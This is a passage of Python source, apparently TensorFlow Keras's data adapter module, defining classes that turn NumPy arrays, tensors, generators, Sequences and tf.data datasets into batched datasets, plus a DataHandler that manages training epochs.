from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import nest
from tensorflow.python.util.tf_export import keras_export
keras_data_adapter_gauge = monitoring.BoolGauge(
"/tensorflow/api/keras/data_adapters", "keras data adapter usage", "method")
try:
from scipy import sparse as scipy_sparse # pylint: disable=g-import-not-at-top
except ImportError:
scipy_sparse = None
try:
import pandas as pd # pylint: disable=g-import-not-at-top
except ImportError:
pd = None
@six.add_metaclass(abc.ABCMeta)
class DataAdapter(object):
"""Base class for input data adapter.
In TF 2.0, tf.data is the preferred API for user to feed in data. In order
to simplify the training code path, all the input data object will be
converted to `tf.data.Dataset` if possible.
Note that since this class is mainly targeted for TF 2.0, it might have a lot
of assumptions under the hood, eg eager context by default, distribution
strategy, etc. In the meantime, some legacy feature support might be dropped,
eg, Iterator from dataset API in v1, etc.
The sample usage of this class is like:
```
x = tf.data.Dataset.range(100)
adapter_cls = [NumpyArrayDataAdapter, ..., DatasetAdapter]
applicable_adapters = [cls for cls in adapter_cls if cls.can_handle(x)]
if len(applicable_adapters) != 1:
raise ValueError("Expect only one adapter class to handle the input")
dataset = applicable_adapters[0](x).get_dataset()
for data in dataset:
# training
```
"""
@staticmethod
def can_handle(x, y=None):
"""Whether the current DataAdapter could handle the input x and y.
Structure wise, x and y can be single object, or list of objects if there
multiple input/output, or dictionary of objects when the intput/output are
named.
Args:
x: input features.
y: target labels. Note that y could be None in the case of prediction.
Returns:
boolean
"""
raise NotImplementedError
@abc.abstractmethod
def __init__(self, x, y=None, **kwargs):
"""Create a DataAdapter based on data inputs.
The caller must make sure to call `can_handle()` first before invoking this
method. Provide unsupported data type will result into unexpected behavior.
Args:
x: input features.
y: target labels. Note that y could be None in the case of prediction.
**kwargs: Other keyword arguments for DataAdapter during the construction
of the tf.dataset.Dataset. For example:
- Numpy data might have `sample_weights` which will be used for
weighting the loss function during training.
- Numpy data might need to have `batch_size` parameter when constructing
the dataset and iterator.
- Certain input might need to be distribution strategy aware. When
`distribution_strategy` is passed, the created dataset need to respect
the strategy.
DataAdapter might choose to ignore any keyword argument if it doesn't
use it, or raise exception if any required argument is not provide.
"""
if not self.can_handle(x, y):
raise ValueError("{} Cannot handle input {}, {}".format(
self.__class__, x, y))
@abc.abstractmethod
def get_dataset(self):
"""Get a dataset instance for the current DataAdapter.
Note that the dataset returned does not repeat for epoch, so caller might
need to create new iterator for the same dataset at the beginning of the
epoch. This behavior might change in future.
Returns:
An tf.dataset.Dataset. Caller might use the dataset in different
context, eg iter(dataset) in eager to get the value directly, or in graph
mode, provide the iterator tensor to Keras model function.
"""
raise NotImplementedError
@abc.abstractmethod
def get_size(self):
"""Return the size (number of batches) for the dataset created.
For certain type of the data input, the number of batches is known, eg for
Numpy data, the size is same as (number_of_element / batch_size). Whereas
for dataset or python generator, the size is unknown since it may or may not
have a end state.
Returns:
int, the number of batches for the dataset, or None if it is unknown. The
caller could use this to control the loop of training, show progress bar,
or handle unexpected StopIteration error.
"""
raise NotImplementedError
@abc.abstractmethod
def batch_size(self):
"""Return the batch size of the dataset created.
For certain type of the data input, the batch size is known, and even
required, like numpy array. Where as for dataset, the batch is unknown
unless we take a peek.
Returns:
int, the batch size of the dataset, or None if it is unknown.
"""
raise NotImplementedError
def representative_batch_size(self):
"""Return a representative size for batches in the dataset.
This is not guaranteed to be the batch size for all batches in the
dataset. It just needs to be a rough approximation for batch sizes in
the dataset.
Returns:
int, a representative size for batches found in the dataset,
or None if it is unknown.
"""
return self.batch_size()
@abc.abstractmethod
def has_partial_batch(self):
"""Whether the dataset has partial batch at the end."""
raise NotImplementedError
@abc.abstractmethod
def partial_batch_size(self):
"""The size of the final partial batch for dataset.
Will return None if has_partial_batch is False or batch_size is None.
"""
raise NotImplementedError
@abc.abstractmethod
def should_recreate_iterator(self):
"""Returns whether a new iterator should be created every epoch."""
raise NotImplementedError
def get_samples(self):
"""Returns number of samples in the data, or `None`."""
if not self.get_size() or not self.batch_size():
return None
total_sample = self.get_size() * self.batch_size()
if self.has_partial_batch():
total_sample -= (self.batch_size() - self.partial_batch_size())
return total_sample
def on_epoch_end(self):
"""A hook called after each epoch."""
pass
class TensorLikeDataAdapter(DataAdapter):
"""Adapter that handles Tensor-like objects, e.g. EagerTensor and NumPy."""
@staticmethod
def can_handle(x, y=None):
# TODO(kaftan): Check performance implications of using a flatten
# here for other types of inputs.
flat_inputs = nest.flatten(x)
if y is not None:
flat_inputs += nest.flatten(y)
tensor_types = (ops.Tensor, np.ndarray)
if pd:
tensor_types = (ops.Tensor, np.ndarray, pd.Series, pd.DataFrame)
def _is_tensor(v):
if isinstance(v, tensor_types):
return True
return False
return all(_is_tensor(v) for v in flat_inputs)
def __init__(self,
x,
y=None,
sample_weights=None,
sample_weight_modes=None,
batch_size=None,
epochs=1,
steps=None,
shuffle=False,
**kwargs):
super(TensorLikeDataAdapter, self).__init__(x, y, **kwargs)
x, y, sample_weights = _process_tensorlike((x, y, sample_weights))
sample_weight_modes = broadcast_sample_weight_modes(
sample_weights, sample_weight_modes)
# If sample_weights are not specified for an output use 1.0 as weights.
(sample_weights, _, _) = training_utils.handle_partial_sample_weights(
y, sample_weights, sample_weight_modes, check_all_flat=True)
inputs = pack_x_y_sample_weight(x, y, sample_weights)
num_samples = set(int(i.shape[0]) for i in nest.flatten(inputs)).pop()
_check_data_cardinality(inputs)
# If batch_size is not passed but steps is, calculate from the input data.
# Default to 32 for backwards compat.
if not batch_size:
batch_size = int(math.ceil(num_samples / steps)) if steps else 32
self._size = int(math.ceil(num_samples / batch_size))
self._batch_size = batch_size
num_full_batches = int(num_samples // batch_size)
self._partial_batch_size = num_samples % batch_size
if isinstance(shuffle, str):
shuffle = shuffle.lower()
self._shuffle = shuffle
# Vectorized version of shuffle.
# This is a performance improvement over using `from_tensor_slices`.
# The indices of the data are shuffled and batched, and these indices
# are then zipped with the data and used to extract a batch of the data
# at each step. The performance improvements here come from:
# 1. vectorized batch using gather
# 2. parallelized map
# 3. pipelined permutation generation
# 4. optimized permutation batching
# 5. disabled static optimizations
indices_dataset = dataset_ops.DatasetV2.range(1)
if shuffle != "batch":
indices_dataset = indices_dataset.repeat(epochs)
def permutation(_):
# It turns out to be more performant to make a new set of indices rather
# than reusing the same range Tensor. (presumably because of buffer
# forwarding.)
indices = math_ops.range(num_samples, dtype=dtypes.int64)
if shuffle and shuffle != "batch":
indices = random_ops.random_shuffle(indices)
return indices
# We prefetch a single element. Computing large permutations can take quite
# a while so we don't want to wait for prefetching over an epoch boundary to
# trigger the next permutation. On the other hand, too many simultaneous
# shuffles can contend on a hardware level and degrade all performance.
indices_dataset = indices_dataset.map(permutation).prefetch(1)
def slice_batch_indices(indices):
"""Convert a Tensor of indices into a dataset of batched indices.
This step can be accomplished in several ways. The most natural is to
slice the Tensor in a Dataset map. (With a condition on the upper index to
handle the partial batch.) However it turns out that coercing the Tensor
into a shape which is divisible by the batch size (and handling the last
partial batch separately) allows for a much more favorable memory access
pattern and improved performance.
Args:
indices: Tensor which determines the data order for an entire epoch.
Returns:
A Dataset of batched indices.
"""
num_in_full_batch = num_full_batches * batch_size
first_k_indices = array_ops.slice(indices, [0], [num_in_full_batch])
first_k_indices = array_ops.reshape(
first_k_indices, [num_full_batches, batch_size])
flat_dataset = dataset_ops.DatasetV2.from_tensor_slices(first_k_indices)
if self._partial_batch_size:
index_remainder = dataset_ops.DatasetV2.from_tensors(array_ops.slice(
indices, [num_in_full_batch], [self._partial_batch_size]))
flat_dataset = flat_dataset.concatenate(index_remainder)
if shuffle == "batch":
# 1024 is a magic constant that has not been properly evaluated
flat_dataset = flat_dataset.shuffle(1024).repeat(epochs)
return flat_dataset
indices_dataset = indices_dataset.flat_map(slice_batch_indices)
dataset = self.slice_inputs(indices_dataset, inputs)
if shuffle == "batch":
def shuffle_batch(*batch):
return nest.map_structure(random_ops.random_shuffle, batch)
dataset = dataset.map(shuffle_batch)
self._dataset = dataset
def slice_inputs(self, indices_dataset, inputs):
"""Slice inputs into a Dataset of batches.
Given a Dataset of batch indices and the unsliced inputs,
this step slices the inputs in a parallelized fashion
and produces a dataset of input batches.
Args:
indices_dataset: A Dataset of batched indices
inputs: A python data structure that contains the inputs, targets,
and possibly sample weights.
Returns:
A Dataset of input batches matching the batch indices.
"""
dataset = dataset_ops.DatasetV2.zip((
indices_dataset,
dataset_ops.DatasetV2.from_tensors(inputs).repeat()
))
def grab_batch(i, data):
return nest.map_structure(lambda d: array_ops.gather(d, i, axis=0), data)
dataset = dataset.map(
grab_batch, num_parallel_calls=dataset_ops.AUTOTUNE)
# Default optimizations are disabled to avoid the overhead of (unnecessary)
# input pipeline graph serialization and deserialization
options = dataset_ops.Options()
options.experimental_optimization.apply_default_optimizations = False
if self._shuffle:
# See b/141490660 for more details.
options.experimental_external_state_policy = (
distribute_options.ExternalStatePolicy.IGNORE)
dataset = dataset.with_options(options)
return dataset
def get_dataset(self):
return self._dataset
def get_size(self):
return self._size
def batch_size(self):
return self._batch_size
def has_partial_batch(self):
return self._partial_batch_size > 0
def partial_batch_size(self):
return self._partial_batch_size or None
def should_recreate_iterator(self):
# An infinite dataset is always created here.
return False
class GenericArrayLikeDataAdapter(TensorLikeDataAdapter):
"""Adapter that handles array-like data without forcing it into memory.
This adapter handles array-like datasets that may be too big to fully
fit into memory.
Specifically, this adapter handles any Python class which implements:
`__get_item__`, `__len__`, `shape`, and `dtype` with the same meanings
as Numpy, but it ignores any case where all the inputs are Tensors or Numpy
arrays (because that case is handled by the base TensorLikeDataAdapter).
It ignores scipy sparse matrices and Composite Tensors because those are
handled by the CompositeTensorDataAdapter.
It also does not handle lists/tuples of scalars, because those are handled
by the ListsOfScalarsDataAdapter.
"""
@staticmethod
def can_handle(x, y=None):
flat_inputs = nest.flatten(x)
if y is not None:
flat_inputs += nest.flatten(y)
def _is_array_like(v):
"""Return True if v is a Tensor, array, or is array-like."""
return (
hasattr(v, "__getitem__") and
hasattr(v, "shape") and
hasattr(v, "dtype") and
hasattr(v, "__len__")
)
if (not TensorLikeDataAdapter.can_handle(x, y) and
not CompositeTensorDataAdapter.can_handle(x, y)):
return all(_is_array_like(v) for v in flat_inputs)
else:
return False
def __init__(self, *args, **kwargs):
logging.warn(
"Keras is training/fitting/evaluating on array-like data. Keras may "
"not be optimized for this format, so if your input data format is "
"supported by TensorFlow I/O (https://github.com/tensorflow/io) we "
"recommend using that to load a Dataset instead.")
super(GenericArrayLikeDataAdapter, self).__init__(*args, **kwargs)
def slice_inputs(self, indices_dataset, inputs):
"""Slice inputs into a Dataset of batches.
Given a Dataset of batch indices and the unsliced inputs,
this step slices the inputs in a parallelized fashion
and produces a dataset of input batches.
Args:
indices_dataset: A Dataset of batched indices
inputs: A python data structure that contains the inputs, targets,
and possibly sample weights.
Returns:
A Dataset of input batches matching the batch indices.
"""
flat_inputs = nest.flatten(inputs)
def dynamic_shape_like(t):
shape = list(t.shape)
shape[0] = None
return tuple(shape)
flat_dtypes = [inp.dtype for inp in flat_inputs]
contiguous = True
if self._shuffle and self._shuffle != "batch":
contiguous = False
def grab_batch(indices):
"""Grab a batch of data from the inputs."""
# This uses a py_function to avoid converting the array-like
# into a Tensor before slicing it, because converting the array-like
# to a Tensor may force it into memory..
def py_method(ind):
def slice_array(data):
return training_utils.slice_arrays(data, ind.numpy(),
contiguous=contiguous)
return [slice_array(inp) for inp in flat_inputs]
flat_out = script_ops.eager_py_func(py_method, [indices], flat_dtypes)
for v, original_inp in zip(flat_out, flat_inputs):
v.set_shape(dynamic_shape_like(original_inp))
return nest.pack_sequence_as(inputs, flat_out)
dataset = indices_dataset.map(
grab_batch, num_parallel_calls=dataset_ops.AUTOTUNE)
return dataset
class DatasetCreatorAdapter(DataAdapter):
"""Adapter that handles dataset functions."""
def __init__(self, x, *args, **kwargs):
super(DatasetCreatorAdapter, self).__init__(x, *args, **kwargs)
if not isinstance(x, dataset_creator.DatasetCreator):
raise TypeError("The input of a `DatasetCreatorAdapter` should be a "
"`DatasetCreator` but it received type {}.".format(
type(x)))
self.dataset_creator = x
self.strategy = kwargs.get("distribution_strategy", None)
@staticmethod
def can_handle(x, y=None):
if isinstance(x, dataset_creator.DatasetCreator):
assert y is None
return True
def should_recreate_iterator(self):
# We expect users to shuffle the dataset in their `dataset_fn` supplied to
# `DatasetCreator`. Since that is a buffered shuffle, we intend to not reset
# the dataset so the batches that are not shuffled can still be pulled.
return False
def get_size(self):
return None # To be inferred by `DataHandler`.
def get_dataset(self):
return self.strategy.distribute_datasets_from_function(self.dataset_creator)
def batch_size(self):
raise NotImplementedError()
def has_partial_batch(self):
raise NotImplementedError()
def partial_batch_size(self):
raise NotImplementedError()
class CompositeTensorDataAdapter(DataAdapter):
"""Adapter that handles composite tensor."""
@staticmethod
def can_handle(x, y=None):
flat_inputs = nest.flatten(x)
if y is not None:
flat_inputs += nest.flatten(y)
def _is_composite(v):
# Dataset/iterator/DistributedDataset inherits from CompositeTensor but
# should be handled by DatasetAdapter and GeneratorAdapter.
if (tf_utils.is_extension_type(v) and
not isinstance(v,
(dataset_ops.DatasetV2, iterator_ops.IteratorBase)) and
not _is_distributed_dataset(v)):
return True
# Support Scipy sparse tensors if scipy is installed
if scipy_sparse is not None and scipy_sparse.issparse(v):
return True
return False
def _is_tensor_or_composite(v):
if isinstance(v, (ops.Tensor, np.ndarray)):
return True
return _is_composite(v)
return (any(_is_composite(v) for v in flat_inputs) and
all(_is_tensor_or_composite(v) for v in flat_inputs))
def __init__(self,
x,
y=None,
sample_weights=None,
sample_weight_modes=None,
batch_size=None,
steps=None,
shuffle=False,
**kwargs):
super(CompositeTensorDataAdapter, self).__init__(x, y, **kwargs)
x, y, sample_weights = _process_tensorlike((x, y, sample_weights))
sample_weight_modes = broadcast_sample_weight_modes(
sample_weights, sample_weight_modes)
# If sample_weights are not specified for an output use 1.0 as weights.
(sample_weights, _, _) = training_utils.handle_partial_sample_weights(
y, sample_weights, sample_weight_modes, check_all_flat=True)
inputs = pack_x_y_sample_weight(x, y, sample_weights)
dataset = dataset_ops.DatasetV2.from_tensor_slices(inputs)
num_samples = int(nest.flatten(x)[0].shape[0])
if shuffle:
dataset = dataset.shuffle(num_samples)
# If batch_size is not passed but steps is, calculate from the input data.
# Default to 32 for backwards compat.
if not batch_size:
batch_size = int(math.ceil(num_samples / steps)) if steps else 32
dataset = dataset.batch(batch_size)
self._size = int(math.ceil(num_samples / batch_size))
self._batch_size = batch_size
self._has_partial_batch = (self._size != (num_samples // batch_size))
self._partial_batch_size = None
if self._has_partial_batch:
self._partial_batch_size = (
num_samples - (self._size - 1) * self._batch_size)
self._dataset = dataset
def get_dataset(self):
return self._dataset
def get_size(self):
return self._size
def batch_size(self):
return self._batch_size
def has_partial_batch(self):
return self._has_partial_batch
def partial_batch_size(self):
return self._partial_batch_size
def should_recreate_iterator(self):
return True
class ListsOfScalarsDataAdapter(DataAdapter):
"""Adapter that handles lists of scalars and lists of lists of scalars."""
@staticmethod
def can_handle(x, y=None):
handles_x = ListsOfScalarsDataAdapter._is_list_of_scalars(x)
handles_y = True
if y is not None:
handles_y = ListsOfScalarsDataAdapter._is_list_of_scalars(y)
return handles_x and handles_y
@staticmethod
def _is_list_of_scalars(inp):
if isinstance(inp, (float, int, str, bytes, bytearray)):
return True
if isinstance(inp, (list, tuple)) and inp:
return ListsOfScalarsDataAdapter._is_list_of_scalars(inp[0])
return False
def __init__(self,
x,
y=None,
sample_weights=None,
sample_weight_modes=None,
batch_size=None,
shuffle=False,
**kwargs):
super(ListsOfScalarsDataAdapter, self).__init__(x, y, **kwargs)
x = np.asarray(x)
if y is not None:
y = np.asarray(y)
if sample_weights is not None:
sample_weights = np.asarray(sample_weights)
sample_weight_modes = broadcast_sample_weight_modes(
sample_weights, sample_weight_modes)
self._internal_adapter = TensorLikeDataAdapter(
x,
y=y,
sample_weights=sample_weights,
sample_weight_modes=sample_weight_modes,
batch_size=batch_size,
shuffle=shuffle,
**kwargs)
def get_dataset(self):
return self._internal_adapter.get_dataset()
def get_size(self):
return self._internal_adapter.get_size()
def batch_size(self):
return self._internal_adapter.batch_size()
def has_partial_batch(self):
return self._internal_adapter.has_partial_batch()
def partial_batch_size(self):
return self._internal_adapter.partial_batch_size()
def should_recreate_iterator(self):
return True
class DatasetAdapter(DataAdapter):
"""Adapter that handles `tf.data.Dataset`."""
@staticmethod
def can_handle(x, y=None):
return (isinstance(x, (dataset_ops.DatasetV1, dataset_ops.DatasetV2)) or
_is_distributed_dataset(x))
def __init__(self,
x,
y=None,
sample_weights=None,
steps=None,
**kwargs):
super(DatasetAdapter, self).__init__(x, y, **kwargs)
# Note that the dataset instance is immutable, its fine to reuse the user
# provided dataset.
self._dataset = x
# The user-provided steps.
self._user_steps = steps
self._validate_args(y, sample_weights, steps)
def get_dataset(self):
return self._dataset
def get_size(self):
return # Inferred in `DataHandler`.
def batch_size(self):
return None
def has_partial_batch(self):
return False
def partial_batch_size(self):
return None
def should_recreate_iterator(self):
# Since DistributedDatasets have no cardinality, the user must provide
# all steps that need to be run, calling `.repeat()` as needed.
if _is_distributed_dataset(self._dataset):
return False
# If user doesn't supply `steps`, or if they supply `steps` that
# exactly equals the size of the `Dataset`, create a new iterator
# each epoch.
return (self._user_steps is None or
cardinality.cardinality(self._dataset).numpy() == self._user_steps)
def _validate_args(self, y, sample_weights, steps):
"""Validates `__init__` arguments."""
# Arguments that shouldn't be passed.
if not is_none_or_empty(y):
raise ValueError("`y` argument is not supported when using "
"dataset as input.")
if not is_none_or_empty(sample_weights):
raise ValueError("`sample_weight` argument is not supported when using "
"dataset as input.")
if steps is None:
if _is_distributed_dataset(self._dataset):
raise ValueError("When providing a distributed dataset, you must "
"specify the number of steps to run.")
size = cardinality.cardinality(self._dataset).numpy()
if size == cardinality.INFINITE and steps is None:
raise ValueError(
"When providing an infinite dataset, you must specify "
"the number of steps to run (if you did not intend to "
"create an infinite dataset, make sure to not call "
"`repeat()` on the dataset).")
class GeneratorDataAdapter(DataAdapter):
"""Adapter that handles python generators and iterators."""
@staticmethod
def can_handle(x, y=None):
return ((hasattr(x, "__next__") or hasattr(x, "next"))
and hasattr(x, "__iter__")
and not isinstance(x, data_utils.Sequence))
def __init__(self,
x,
y=None,
sample_weights=None,
workers=1,
use_multiprocessing=False,
max_queue_size=10,
model=None,
**kwargs):
# Generators should never shuffle as exhausting the generator in order to
# shuffle the batches is inefficient.
kwargs.pop("shuffle", None)
if not is_none_or_empty(y):
raise ValueError("`y` argument is not supported when using "
"python generator as input.")
if not is_none_or_empty(sample_weights):
raise ValueError("`sample_weight` argument is not supported when using "
"python generator as input.")
super(GeneratorDataAdapter, self).__init__(x, y, **kwargs)
# Since we have to know the dtype of the python generator when we build the
# dataset, we have to look at a batch to infer the structure.
peek, x = self._peek_and_restore(x)
peek = self._standardize_batch(peek)
peek = _process_tensorlike(peek)
# Need to build the Model on concrete input shapes.
if model is not None and not model.built:
concrete_x, _, _ = unpack_x_y_sample_weight(peek)
model.distribute_strategy.run(
lambda x: model(x, training=False), args=(concrete_x,))
self._first_batch_size = int(nest.flatten(peek)[0].shape[0])
def _get_dynamic_shape(t):
shape = t.shape
# Unknown number of dimensions, `as_list` cannot be called.
if shape.rank is None:
return shape
return tensor_shape.TensorShape([None for _ in shape.as_list()])
output_shapes = nest.map_structure(_get_dynamic_shape, peek)
output_types = nest.map_structure(lambda t: t.dtype, peek)
# Note that dataset API takes a callable that creates a generator object,
# rather than generator itself, which is why we define a function here.
generator_fn = self._handle_multiprocessing(x, workers, use_multiprocessing,
max_queue_size)
def wrapped_generator():
for data in generator_fn():
yield self._standardize_batch(data)
dataset = dataset_ops.DatasetV2.from_generator(
wrapped_generator, output_types, output_shapes=output_shapes)
if workers == 1 and not use_multiprocessing:
dataset = dataset.prefetch(1)
self._dataset = dataset
def _standardize_batch(self, data):
"""Standardizes a batch output by a generator."""
# Removes `None`s.
x, y, sample_weight = unpack_x_y_sample_weight(data)
data = pack_x_y_sample_weight(x, y, sample_weight)
data = nest.list_to_tuple(data)
def _convert_dtype(t):
if (isinstance(t, np.ndarray) and issubclass(t.dtype.type, np.floating)):
return np.array(t, dtype=backend.floatx())
return t
data = nest.map_structure(_convert_dtype, data)
return data
@staticmethod
def _peek_and_restore(x):
peek = next(x)
return peek, itertools.chain([peek], x)
def _handle_multiprocessing(self, x, workers, use_multiprocessing,
max_queue_size):
"""Create a callable, possibly including an Enqueuer."""
if workers > 1 or (workers > 0 and use_multiprocessing):
def generator_fn():
enqueuer = data_utils.GeneratorEnqueuer(
x, use_multiprocessing=use_multiprocessing)
enqueuer.start(workers=workers, max_queue_size=max_queue_size)
return enqueuer.get()
else:
generator_fn = lambda: x
return generator_fn
def get_dataset(self):
return self._dataset
def get_size(self):
return None
def batch_size(self):
return None
def representative_batch_size(self):
return self._first_batch_size
def has_partial_batch(self):
return False
def partial_batch_size(self):
return
def should_recreate_iterator(self):
return False
class KerasSequenceAdapter(GeneratorDataAdapter):
"""Adapter that handles `keras.utils.Sequence`."""
@staticmethod
def can_handle(x, y=None):
return isinstance(x, data_utils.Sequence)
def __init__(self,
x,
y=None,
sample_weights=None,
shuffle=False,
workers=1,
use_multiprocessing=False,
max_queue_size=10,
model=None,
**kwargs):
if not is_none_or_empty(y):
raise ValueError("`y` argument is not supported when using "
"`keras.utils.Sequence` as input.")
if not is_none_or_empty(sample_weights):
raise ValueError("`sample_weight` argument is not supported when using "
"`keras.utils.Sequence` as input.")
self._size = len(x)
self._shuffle_sequence = shuffle
self._keras_sequence = x
self._enqueuer = None
super(KerasSequenceAdapter, self).__init__(
x,
shuffle=False, # Shuffle is handed in the _make_callable override.
workers=workers,
use_multiprocessing=use_multiprocessing,
max_queue_size=max_queue_size,
model=model,
**kwargs)
@staticmethod
def _peek_and_restore(x):
return x[0], x
def _handle_multiprocessing(self, x, workers, use_multiprocessing,
max_queue_size):
if workers > 1 or (workers > 0 and use_multiprocessing):
def generator_fn():
self._enqueuer = data_utils.OrderedEnqueuer(
x, use_multiprocessing=use_multiprocessing,
shuffle=self._shuffle_sequence)
self._enqueuer.start(workers=workers, max_queue_size=max_queue_size)
return self._enqueuer.get()
else:
def generator_fn():
order = range(len(x))
if self._shuffle_sequence:
# Match the shuffle convention in OrderedEnqueuer.
order = list(order)
random.shuffle(order)
for i in order:
yield x[i]
return generator_fn
def get_size(self):
return self._size
def should_recreate_iterator(self):
return True
def on_epoch_end(self):
if self._enqueuer:
self._enqueuer.stop()
self._keras_sequence.on_epoch_end()
ALL_ADAPTER_CLS = [
ListsOfScalarsDataAdapter, TensorLikeDataAdapter,
GenericArrayLikeDataAdapter, DatasetAdapter, GeneratorDataAdapter,
KerasSequenceAdapter, CompositeTensorDataAdapter, DatasetCreatorAdapter
]
def select_data_adapter(x, y):
"""Selects a data adapter than can handle a given x and y."""
adapter_cls = [cls for cls in ALL_ADAPTER_CLS if cls.can_handle(x, y)]
if not adapter_cls:
# TODO(scottzhu): This should be a less implementation-specific error.
raise ValueError(
"Failed to find data adapter that can handle "
"input: {}, {}".format(
_type_name(x), _type_name(y)))
elif len(adapter_cls) > 1:
raise RuntimeError(
"Data adapters should be mutually exclusive for "
"handling inputs. Found multiple adapters {} to handle "
"input: {}, {}".format(
adapter_cls, _type_name(x), _type_name(y)))
# Instrument the data adapter usage before returning it
keras_data_adapter_gauge.get_cell(adapter_cls[0].__name__).set(True)
return adapter_cls[0]
def _type_name(x):
"""Generates a description of the type of an object."""
if isinstance(x, dict):
key_types = set(_type_name(key) for key in x.keys())
val_types = set(_type_name(key) for key in x.values())
return "({} containing {} keys and {} values)".format(
type(x), key_types, val_types)
if isinstance(x, (list, tuple)):
types = set(_type_name(val) for val in x)
return "({} containing values of types {})".format(
type(x), types)
return str(type(x))
def _process_tensorlike(inputs):
"""Process tensor-like inputs.
This function:
(1) Converts `Numpy` arrays to `Tensor`s.
(2) Converts `Scipy` sparse matrices to `SparseTensor`s.
(2) Converts `list`s to `tuple`s (for `tf.data` support).
Args:
inputs: Structure of `Tensor`s, `NumPy` arrays, or tensor-like.
Returns:
Structure of `Tensor`s or tensor-like.
"""
def _convert_numpy_and_scipy(x):
if isinstance(x, np.ndarray):
dtype = None
if issubclass(x.dtype.type, np.floating):
dtype = backend.floatx()
return ops.convert_to_tensor_v2_with_dispatch(x, dtype=dtype)
elif scipy_sparse and scipy_sparse.issparse(x):
return _scipy_sparse_to_sparse_tensor(x)
return x
inputs = nest.map_structure(_convert_numpy_and_scipy, inputs)
return nest.list_to_tuple(inputs)
def is_none_or_empty(inputs):
# util method to check if the input is a None or a empty list.
# the python "not" check will raise an error like below if the input is a
# numpy array
# "The truth value of an array with more than one element is ambiguous.
# Use a.any() or a.all()"
return inputs is None or not nest.flatten(inputs)
def broadcast_sample_weight_modes(target_structure, sample_weight_modes):
"""Match sample_weight_modes structure with output structure."""
if target_structure is None or not nest.flatten(target_structure):
return sample_weight_modes
if isinstance(sample_weight_modes, str):
if isinstance(target_structure, dict):
return {key: sample_weight_modes for key in target_structure.keys()}
return [sample_weight_modes for _ in target_structure]
if sample_weight_modes:
try:
nest.assert_same_structure(
training_utils.list_to_tuple(target_structure),
training_utils.list_to_tuple(sample_weight_modes))
except (ValueError, TypeError):
target_str = str(nest.map_structure(lambda _: "...", target_structure))
mode_str = str(nest.map_structure(lambda _: "...", sample_weight_modes))
# Attempt to coerce sample_weight_modes to the target structure. This
# implicitly depends on the fact that Model flattens outputs for its
# internal representation.
try:
sample_weight_modes = nest.pack_sequence_as(
target_structure, nest.flatten(sample_weight_modes))
logging.warning(
"sample_weight modes were coerced from\n {}\n to \n {}"
.format(target_str, mode_str))
except (ValueError, TypeError):
raise ValueError(
"Unable to match target structure and sample_weight_modes "
"structure:\n {}\n to \n {}".format(target_str, mode_str))
return sample_weight_modes
class DataHandler(object):
"""Handles iterating over epoch-level `tf.data.Iterator` objects."""
def __init__(self,
x,
y=None,
sample_weight=None,
batch_size=None,
steps_per_epoch=None,
initial_epoch=0,
epochs=1,
shuffle=False,
class_weight=None,
max_queue_size=10,
workers=1,
use_multiprocessing=False,
model=None,
steps_per_execution=None,
distribute=True):
"""Initializes a `DataHandler`.
Arguments:
x: See `Model.fit`.
y: See `Model.fit`.
sample_weight: See `Model.fit`.
batch_size: See `Model.fit`.
steps_per_epoch: See `Model.fit`.
initial_epoch: See `Model.fit`.
epochs: See `Model.fit`.
shuffle: See `Model.fit`.
class_weight: See `Model.fit`.
max_queue_size: See `Model.fit`.
workers: See `Model.fit`.
use_multiprocessing: See `Model.fit`.
model: The `Model` instance. Needed in order to correctly `build` the
`Model` using generator-like inputs (see `GeneratorDataAdapter`).
steps_per_execution: See `Model.compile`.
distribute: Whether to distribute the `tf.dataset`.
`PreprocessingLayer.adapt` does not support distributed datasets,
`Model` should always set this to `True`.
"""
self._initial_epoch = initial_epoch
self._epochs = epochs
self._insufficient_data = False
self._model = model
# `steps_per_execution_value` is the cached initial value.
# `steps_per_execution` is mutable and may be changed by the DataAdapter
# to handle partial executions.
if steps_per_execution is None:
self._steps_per_execution = 1
self._steps_per_execution_value = 1
else:
self._steps_per_execution = steps_per_execution
self._steps_per_execution_value = steps_per_execution.numpy().item()
adapter_cls = select_data_adapter(x, y)
self._verify_data_adapter_compatibility(adapter_cls)
self._adapter = adapter_cls(
x,
y,
batch_size=batch_size,
steps=steps_per_epoch,
epochs=epochs - initial_epoch,
sample_weights=sample_weight,
shuffle=shuffle,
max_queue_size=max_queue_size,
workers=workers,
use_multiprocessing=use_multiprocessing,
distribution_strategy=ds_context.get_strategy(),
model=model)
strategy = ds_context.get_strategy()
self._current_step = 0
self._step_increment = self._steps_per_execution_value - 1
self._insufficient_data = False
self._configure_dataset_and_inferred_steps(strategy, x, steps_per_epoch,
class_weight, distribute)
def _verify_data_adapter_compatibility(self, adapter_cls):
pass
def _configure_dataset_and_inferred_steps(self, strategy, x, steps_per_epoch,
class_weight, distribute):
"""Configure the `_dataset` and `_inferred_steps` attributes."""
del x
dataset = self._adapter.get_dataset()
if class_weight:
dataset = dataset.map(_make_class_weight_map_fn(class_weight))
self._inferred_steps = self._infer_steps(steps_per_epoch, dataset)
# `PreprocessingLayer.adapt` does not currently support distributed
# datasets, so we pass `distribute=False` there.
if distribute and not _is_distributed_dataset(dataset):
dataset = strategy.experimental_distribute_dataset(dataset)
self._dataset = dataset
self._validate_data_handler()
def enumerate_epochs(self):
"""Yields `(epoch, tf.data.Iterator)`."""
with self._truncate_execution_to_epoch():
data_iterator = iter(self._dataset)
for epoch in range(self._initial_epoch, self._epochs):
if self._insufficient_data: # Set by `catch_stop_iteration`.
break
if self._adapter.should_recreate_iterator():
data_iterator = iter(self._dataset)
yield epoch, data_iterator
self._adapter.on_epoch_end()
@contextlib.contextmanager
def _truncate_execution_to_epoch(self):
"""Truncates steps per execution to at most one epoch."""
should_truncate = (
self._inferred_steps is not None and
self._steps_per_execution_value > self._inferred_steps)
original_value = self._steps_per_execution_value
try:
if should_truncate:
self._steps_per_execution.assign(self._inferred_steps)
self._steps_per_execution_value = self._inferred_steps
yield
finally:
if should_truncate:
self._steps_per_execution.assign(original_value)
self._steps_per_execution_value = original_value
def sync(self):
context.async_wait()
@contextlib.contextmanager
def catch_stop_iteration(self):
"""Catches errors when an iterator runs out of data."""
try:
yield
self.sync()
except (StopIteration, errors.OutOfRangeError):
if self._inferred_steps is None:
self._inferred_steps = self._current_step
else:
self._insufficient_data = True
total_epochs = self._epochs - self._initial_epoch
logging.warning(
"Your input ran out of data; interrupting training. "
"Make sure that your dataset or generator can generate at "
"least `steps_per_epoch * epochs` batches (in this case, "
"{} batches). You may need to use the repeat() function "
"when building your dataset.".format(total_epochs *
self._inferred_steps))
